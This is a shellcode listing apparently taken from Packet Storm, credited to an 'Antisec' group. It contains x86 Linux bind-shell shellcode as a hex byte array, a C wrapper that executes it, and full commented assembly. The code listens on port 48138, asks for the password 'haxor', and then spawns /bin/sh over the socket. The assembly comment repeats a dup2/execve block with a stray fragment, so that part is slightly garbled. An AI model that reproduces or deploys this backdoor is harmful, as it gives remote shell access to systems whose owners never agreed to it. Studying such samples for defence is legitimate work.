Shellcode for binding to port 48138 and requiring a password of haxor.
b47480e34fb41f125be3325034ad0d4d2c62187de7fcf8bb77fcaa62c59817be/*
*
*
# Private Antisec Productions.
# Greetz to newroot,esdee,rave,gorny, ...
#polygrithm@hotmail
###################
# AUTH-BIND-CODE #
# BY NRAZIZ #
# JAN.04 #
# @nt!s3c-cr3w #
#nraziz@antisec.de#
###################
*
*
*/
/*
* Binds to port 0xabc (48138)
* Password: haxor
*/
char bindcode[]=
"\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x31\xd2\x52\x66\x68\xbc\x0a\x66\x6a\x02\x89\xe2\x6a"
// port ^^ ^^
"\x10\x52\x6a\x03\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x6a"
"\x02\x6a\x03\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xc9"
"\x51\x51\x6a\x03\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x31"
"\xdb\x53\x6a\x3a\x68\x50\x61\x73\x73\x89\xe6\x6a\x05"
"\x56\x6a\x04\x89\xe1\xb3\x09\xb0\x66\xcd\x80\x31\xc9"
"\x31\xf6\x51\x6a\x05\x52\x6a\x04\x89\xe1\xb3\x0a\xb0"
"\x66\xcd\x80\x31\xc9\x51\x6a\x72\x68\x68\x61\x78\x6f"
"\x89\xe7\x89\xd6\x80\xc1\x05\xfc\xf3\xa6\x75\xbf\x31"
"\xc9\xb3\x04\xb0\x3f\xcd\x80\x41\x83\xf9\x03\x75\xf6"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xb0"
"\x01\xcd\x80";
int main(void)
{
(*(void (*)())bindcode)();
return 0;
}
/*
********* ASM CODE *************
.section .text
.globl _start
_start:
#socket(2,1,0)
xorl %ebx,%ebx
push %ebx
incl %ebx
push %ebx
push $0x2
movl %esp,%ecx
movb $0x66,%al
int $0x80
#info.sin_addr.saddr=0x0,info.sin_port=0xabc,info.sin_family=2
xorl %edx,%edx
pushl %edx
pushw $0xabc
pushw $0x2
movl %esp,%edx
#bind(sockfd,&info,0x10)
#0x3 return fd from socket()
push $0x10
push %edx
push $0x3
movl %esp,%ecx
incb %bl
movb $0x66,%al
int $0x80
#listen(sockfd,3)
push $0x2
push $0x3
movl %esp,%ecx
movb $0x4,%bl
movb $0x66,%al
int $0x80
#accept(sockfd,0,0)
xorl %ecx,%ecx
push %ecx
push %ecx
push $0x3
movl %esp,%ecx
incb %bl
movb $0x66,%al
int $0x80
again:
#send()
xorl %ebx,%ebx
push %ebx #this is better then some
push $0x3a #stupid [jmp,call] teknique :)
push $0x73736150 #"Pass" followed by ":" and 0x0
movl %esp,%esi
push $0x5
push %esi
push $0x4
movl %esp,%ecx
movb $0x9,%bl
movb $0x66,%al
int $0x80
#recv()
xorl %ecx,%ecx
xorl %esi,%esi
push %ecx
push $0x5
push %edx
push $0x4
movl %esp,%ecx
movb $10,%bl
movb $0x66,%al
int $0x80
#compareing da passworz
xorl %ecx,%ecx
push %ecx
push $0x72
push $0x6f786168
movl %esp,%edi
movl %edx,%esi
add $0x5,%cl
cld
rep cmpsb
jnz again
#dup2()'s
xorl %ecx,%ecx
movb $0x4,%bl
loop:
movb $0x3f,%al
int $0x80
incl %ecx
cmpl $0x3,%ecx
jne loop
#execve()
xorl %eax,%eax
push %eax
push $0x68732f2f
push $0x6e69622f
movl %esp,%ebx
push %eax
movb $0x3f,%al
int $0x80
incl %ecx
cmpl $0x3,%ecx
jne loop
#execve()
xorl %eax,%eax
push %eax
push $0x68732f2f
push $0x6e69622f
movl %esp,%ebx
push %eax
push %ebx
movl %esp,%ecx
xorl %edx,%edx
movb $0xb,%al
int $0x80
#exit()
movb $0x1,%al
int $0x80
******************************************************
*/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed